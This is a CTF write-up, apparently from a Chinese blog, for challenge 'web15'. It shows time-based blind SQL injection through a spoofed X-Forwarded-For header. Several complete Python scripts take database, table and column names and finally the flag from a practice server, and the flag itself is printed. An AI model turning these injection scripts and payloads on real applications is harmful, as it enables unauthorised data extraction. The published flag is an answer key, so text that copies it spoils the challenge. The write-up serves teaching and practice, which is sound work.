- 1Flink 内核原理与实现-状态原理_flink state实现
- 2gerrit submit撤回_Gerrit使用篇-提交代码,合并代码
- 3关系抽取(三)实体关系联合抽取:CasRel_最新的实体关系抽取工具
- 4webpack-theme-color-replacer自定义element-ui主题
- 5【Unity】天气特效:打雷下雨_unity落雷特效制作
- 6Cognex VisionPro连接USB相机的两种品牌
- 7极其强大的数据统计软件 Stata 安装教程_如何把stata装到硬盘里面
- 8Oracle使用序列触发器实现主键id自动增长_oracle的id自增序列
- 9蚁剑下载、安装_蚁剑 下载 csdn
- 10AI+AR,二维码还能这么玩儿!优质提示词的12个技巧;LLM学习路径和资料汇总;AI二维码工具大盘点 | ShowMeAI日报_quick qr提示词
CTF Web5练习平台:web15源代码分析与注入利用
赞
踩
1、web15
image
这道题的题目已经将源代码给我们了
可以看出这是time-based盲注
点开链接,我们看到
image
想到可以尝试各种IP的HTTP头:
X-Forwarded-For
Client-IP
x-remote-IP
x-originating-IP
x-remote-addr
发现X-Forwarded-For可以伪造
image
发现注入的语句原封不动的显示在页面中,但如果注入的语句中有逗号,则逗号后面的内容就不会显示在页面中
image
逗号后面的内容被截掉了
然后就可以写一个脚本爆破得到库名,表名和字段名了
首先我们来找一下数据库名
# -*- coding:utf-8 -*-
import requests
import string
url = "http://120.24.86.145:8002/web15/"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
database=[]
for database_number in range(0,100): #假设爆破前100个库
databasename=''
for i in range(1,100): #爆破字符串长度,假设不超过100长度
flag=0
for str in guess: #爆破该位置的字符
#print 'trying ',str
headers = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
databasename+=str
flag=1
print('正在扫描第%d个数据库名,the databasename now is '%(database_number+1) ,databasename)
break
if flag==0:
break
database.append(databasename)
if i==1 and flag==0:
print('扫描完成')
break
for i in range(len(database)):
print(database[i])
找到的数据库为
TIM截图20180202145718.png
这里有两个数据库,我们先尝试information_schema这个数据库
用脚本跑一下有多少列
# -*- coding:utf-8 -*-
import requests
import string
url = "http://120.24.86.145:8002/web15/"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
database=[]
for table_number in range(0,500):
print('trying',table_number)
headers = {"X-forwarded-for":"'+"+" (select case when (select count(table_name) from information_schema.TABLES ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
print(table_number)
break
TIM截图20180202154423.png
一共42列,一般猜测在最后,前面应该都是information_schema里的那些
尝试一下
# -*- coding:utf-8 -*-
import requests
import string
url = "http://120.24.86.145:8002/web15/"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
tables=[]
for table_number in range(41,42): #假设从第60个开始
tablename=''
for i in range(1,100): #爆破字符串长度,假设不超过100长度
flag=0
for str in guess: #爆破该位置的字符
headers = {"X-forwarded-for":"'+"+" (select case when (substring((select table_name from information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(table_number,i,str)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
tablename+=str
flag=1
print('正在扫描第%d个数据库名,the tablename now is '%(table_number+1) ,tablename)
break
if flag==0:
break
tables.append(tablename)
if i==1 and flag==0:
print('扫描完成')
break
for i in range(len(tables)):
print(tables[i])
TIM截图20180202153421.png
找到了flag表
接下来求列名
再跑一下有多少列
# -*- coding:utf-8 -*-
import requests
import string
url = "http://120.24.86.145:8002/web15/"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
database=[]
for table_number in range(0,1000):
print('trying',table_number)
headers = {"X-forwarded-for":"'+"+" (select case when (select count(COLUMN_name) from information_schema.COLUMNS ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
print(table_number)
break
TIM截图20180202155052.png
一共483列
老思路,直接暴力最后一个
# -*- coding:utf-8 -*-
import requests
import string
url = "http://120.24.86.145:8002/web15/"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
columns=[]
for column_number in range(482,483): #假设从第60个开始
cloumnname=''
for i in range(1,100): #爆破字符串长度,假设不超过100长度
flag=0
for str in guess: #爆破该位置的字符
#print 'trying',str
headers = {"X-forwarded-for":"'+"+" (select case when (substring((select COLUMN_name from information_schema.COLUMNS limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(column_number,i,str)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
cloumnname+=str
flag=1
print('正在扫描第%d个列名,the cloumnname now is '%(column_number+1) ,cloumnname)
break
if flag==0:
break
columns.append(cloumnname)
if i==1 and flag==0:
print('扫描完成')
break
for i in range(len(columns)):
print(columns[i])
TIM截图20180202155419.png
然后直接暴力找flag就行了
import requests
import string
words = string.ascii_lowercase + string.ascii_uppercase + string.digits
url = 'http://120.24.86.145:8002/web15/'
answer=''
for length in range(1,100):
flag=0
for key in words:
data = "'+(select case when (substring((select flag from flag) from {0} for 1)='{1}') then sleep() else 1 end) and '1'='1".format(length,str(key))
headers={
"X-FORWARDED-FOR": data
}
try:
res=requests.get(url,headers=headers,timeout=5)
except Exception as e:
answer+=key
print(answer)
flag=1
break
if flag==0 and answer!= '':
break;
print(answer)
flag{cdbf14c9551d5be5612f7bb5d2867853}
